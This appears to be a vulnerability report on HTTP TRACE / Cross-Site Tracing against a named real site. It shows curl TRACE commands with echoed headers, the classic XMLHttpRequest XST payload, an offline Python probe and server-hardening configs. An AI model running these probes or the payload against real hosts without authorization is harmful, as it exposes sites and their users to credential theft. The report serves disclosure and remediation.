XST (Cross-Site Tracing)

Description

Vulnerability Description: Cross-Site Tracing (XST)

Cross-Site Tracing (XST) arises when a web server, or a proxy in front of it, honours the HTTP TRACE method. TRACE is a diagnostic loopback defined in RFC 9110: the final recipient reflects the request it received, request line and headers included, back to the client as the body of a 200 response. Because the reflected copy carries whatever the client sent, a TRACE response can disclose session cookies, Authorization headers or other credentials, and it also reveals headers added along the way by intermediaries. Historically XST was combined with Cross-Site Scripting (XSS): a script that cannot read an HttpOnly cookie through document.cookie could instead issue a TRACE request and read the cookie from the reflected headers.

Impact:
Potential Data Exposure: the TRACE response reflects sensitive headers (cookies, bearer tokens) sent by the client. Combined with another weakness, for example an XSS on the same site, this defeats the HttpOnly flag, which only blocks document.cookie and does nothing against a TRACE echo.
Exploitation Vector: classically, JavaScript running in the victim's browser issued a TRACE request to the vulnerable server and read the echoed headers. Current browsers refuse to send TRACE from XMLHttpRequest or fetch, so the realistic path today is a legacy browser or a non-browser client, and the finding is normally rated low severity.
Chained Attacks: where those conditions hold, XST facilitates session hijacking, credential theft or impersonation.

Step 1: Verify TRACE Method Support

Run the following command to check whether the TRACE method is enabled. A server with TRACE disabled typically answers 405 Method Not Allowed; a server that honours it returns 200 with a body of type message/http containing a copy of the request, as seen here:

Request:

curl -s -X TRACE https://www.westernunion.gr

Response:

TRACE / HTTP/1.1
Host: www.westernunion.gr
User-Agent: curl/8.11.1
Accept: */*
X-Forwarded-For: 24.202.251.187
X-Real-IP: 24.202.251.187
X-Forwarded-Proto: https

Step 2: Demonstrate Header Echo

Add a custom header to show that the server reflects arbitrary client-supplied data. A made-up Authorization value is used so that no real credential is sent; in a real session this would be the user's cookie or bearer token:

Request:

curl -s -X TRACE https://www.westernunion.gr -H "Authorization: Bearer test12345"

Response:

TRACE / HTTP/1.1
Host: www.westernunion.gr
User-Agent: curl/8.11.1
Accept: */*
Authorization: Bearer test12345
X-Forwarded-For: 24.202.251.187
X-Real-IP: 24.202.251.187
X-Forwarded-Proto: https

The Authorization header comes straight back, so any credential a client includes in a request to this host is returned to whoever can read the TRACE response. Two further details are worth recording: the reflected copy contains X-Forwarded-For, X-Real-IP and X-Forwarded-Proto headers that curl never sent, so a reverse proxy sits in front of the origin and the TRACE request is being passed through it, and those values disclose the client address as recorded by that proxy.

Step 3: Exploiting with XST and JavaScript

The classic XST payload sends a TRACE request from script running in the victim's browser and reads the reflected headers. The following is that payload; current browsers refuse this request, which is one reason the finding is usually rated low:

var xhr = new XMLHttpRequest();
// TRACE is a forbidden method in the XMLHttpRequest standard: current browsers
// throw a SecurityError here and nothing is sent.
xhr.open("TRACE", "https://www.westernunion.gr", true);
// Redundant on a same-origin request (the browser attaches the site's cookies
// itself) and "Cookie" is a forbidden header name that browsers silently drop.
xhr.setRequestHeader("Cookie", document.cookie);
xhr.onreadystatechange = function() {
    if (xhr.readyState == 4 && xhr.status == 200) {
        console.log(xhr.responseText); // Captures and logs the echoed headers
    }
};
xhr.send();

If this script were injected into a page on the target (through an XSS, for instance), it would run in the victim's browser, send the TRACE request and read back the reflected headers, including the cookies the browser attached automatically; that is how XST historically bypassed HttpOnly. In practice the XMLHttpRequest and Fetch standards list TRACE (together with CONNECT and TRACK) as forbidden methods, so every maintained browser rejects xhr.open("TRACE", ...) with a SecurityError and fetch() with a TypeError before any request leaves the machine. The finding therefore rests on the server-side misconfiguration and the credential echo shown with curl, not on a working browser exploit.
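The three steps above can be reproduced offline. The following Python script is an added example, not part of the original report and not the target's code: it starts a throwaway local HTTP server in two configurations, one that reflects TRACE requests the way the server above does and one that refuses them with 405, and runs against each the same canary-header check that Step 2 performs with curl. The local server, the X-Canary header name and the canary value are all constructed for the example.

```python
"""Added example (not from the original report): offline TRACE probe.

Two throwaway local servers are started in threads:
  * EchoingHandler -- vulnerable behaviour, reflects TRACE like the target above;
  * FixedHandler   -- hardened behaviour, refuses TRACE with 405 (TraceEnable Off).
trace_enabled() sends a TRACE carrying a random canary header (X-Canary, a name
chosen for this example) and reports whether the canary comes back.
"""
import http.client
import secrets
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


class EchoingHandler(BaseHTTPRequestHandler):
    """Vulnerable: TRACE reflects the request line and headers (RFC 9110 9.3.8)."""
    protocol_version = "HTTP/1.1"

    def do_TRACE(self):
        body = (self.requestline + "\r\n" + str(self.headers)).encode()
        self.send_response(200)
        self.send_header("Content-Type", "message/http")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the example quiet


class FixedHandler(EchoingHandler):
    """Hardened: TRACE is refused, the equivalent of Apache's 'TraceEnable Off'."""

    def do_TRACE(self):
        self.send_response(405)
        self.send_header("Allow", "GET, HEAD, POST")
        self.send_header("Content-Length", "0")
        self.end_headers()


def start_server(handler):
    """Bind to an ephemeral port on localhost and serve from a daemon thread."""
    srv = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def trace_enabled(host, port, timeout=5):
    """Return True if the server reflects a TRACE request.

    The decision keys on the canary value, not just on a 200 status, so a
    front end that answers every unknown method with a 200 error page does
    not produce a false positive.
    """
    canary = secrets.token_hex(8)
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("TRACE", "/", headers={"X-Canary": canary})
        resp = conn.getresponse()
        body = resp.read().decode(errors="replace")
    finally:
        conn.close()
    return resp.status == 200 and canary in body


def demo():
    """Probe both local configurations; returns {'echo': True, 'fixed': False}."""
    results = {}
    for name, handler in (("echo", EchoingHandler), ("fixed", FixedHandler)):
        srv = start_server(handler)
        try:
            results[name] = trace_enabled(*srv.server_address)
        finally:
            srv.shutdown()
            srv.server_close()
    return results


if __name__ == "__main__":
    for name, enabled in demo().items():
        print(f"{name}: TRACE {'ENABLED (vulnerable)' if enabled else 'blocked'}")
```

To reproduce Step 2 against a real host, call trace_enabled() with that host and port, using http.client.HTTPSConnection instead of HTTPConnection for HTTPS; the canary check is the same one that the curl output above demonstrates by hand.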

Recommendations:
Disable TRACE Method: Restrict the TRACE method in the web server's configuration to prevent abuse.
For Apache:

TraceEnable Off

For Nginx: nginx does not implement TRACE and answers it with 405 Not Allowed by default, so an explicit rule is only needed where a front-end proxy forwards the method; the reflected X-Forwarded-* headers above indicate that such a proxy is in place. For IIS: deny the TRACE verb (and its legacy alias TRACK) under Request Filtering, either in web.config or in IIS Manager.

After the change, re-run the Step 1 command: the server should answer 405 Method Not Allowed and reflect nothing.
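As an added example (not from the original report, and not the target's real configuration), the nginx rule referred to above, written so that it also covers TRACK; the server_name and upstream address are placeholders:

```nginx
server {
    listen 80;
    server_name example.com;          # placeholder, not the target

    # nginx already answers TRACE with 405; this makes the policy explicit and
    # also covers TRACK, the legacy IIS alias, in case an upstream or a
    # front-end proxy would otherwise honour either method.
    if ($request_method ~ ^(TRACE|TRACK)$) {
        return 405;
    }

    location / {
        proxy_pass http://127.0.0.1:8080;   # placeholder origin
    }
}
```

Test the rule with the Step 1 curl command against the nginx listener: the expected answer is 405 with no reflected request line or headers.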

Set Secure Cookie Attributes: use the HttpOnly and Secure flags on session cookies. This does not by itself fix XST (bypassing HttpOnly was the original purpose of the technique), but once TRACE is disabled it limits what an XSS on the site can reach.